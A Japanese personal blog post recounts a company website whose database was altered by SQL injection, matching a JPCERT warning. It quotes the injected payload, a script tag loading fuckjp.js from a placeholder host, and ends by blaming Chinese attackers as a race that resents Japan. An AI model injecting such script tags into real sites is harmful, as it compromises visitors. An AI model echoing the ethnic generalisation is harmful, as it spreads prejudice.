えぇ、まぁ、そういう事ですとも。どうも、ダムログの時間です。
昨日、会社のサイトが改竄に遭い、データベースが改竄されている事が発覚し、今までに無い改竄だったので、右往左往していました。
とにかく原因がわからない。HTMLそのものやJavaScriptの外部ファイルを書き換えられる事は過去にあり、それぞれ対応して1年近く改竄は無かったのですが、今回はなんとデータベースの改竄。
これまで経験した事が無かったので、チンプンカンプンです。
んで、今日師匠にも色々みてもらって、クロスサイトスクリプティングやSQLインジェクションが原因では?という流れになったのですが、まだ具体的な原因が掴めておらず、そうこうしているうちにJPCERTから「SQLインジェクションによるWebサイト改ざんに関する注意喚起」というメールが届いていました。
なんとびっくり。改竄手法はここに載ってる事そのまま。「<script src=http://<任意のホスト>/fuckjp.js></script>」がSQLのデータに追記されていたのです。
これで原因はSQLインジェクションである事がほぼ断定できたわけですが、それに対する対応方法がまったくワカラナイ。調べ方もワカラナイ。とりあえずSQLの構文を走らせて見れば良いってこと??
う~ん・・・。とにかくまた勉強をしなければならないと言う事です。
それにしても、ここのところ色んな犯罪者のせいで、仕事に負担がかかって仕方が無い。アレを持ち込んだNやKやK、んでアレを持ち去ったI、んで今回SQLインジェクション攻撃をしてきた誰か。
まぁ多分今回のはまた中国人なんだろうけど。相手ホストのドメイン所有者やIPは中国だったし、だいたい「FUCKJP」って時点で日本を恨んでる人種としか言いようが無い。あ、こいつらがいたかw
くそぅ。とにかくだ。
おめぇら余計な仕事を増やすんじゃない!!
5 Comments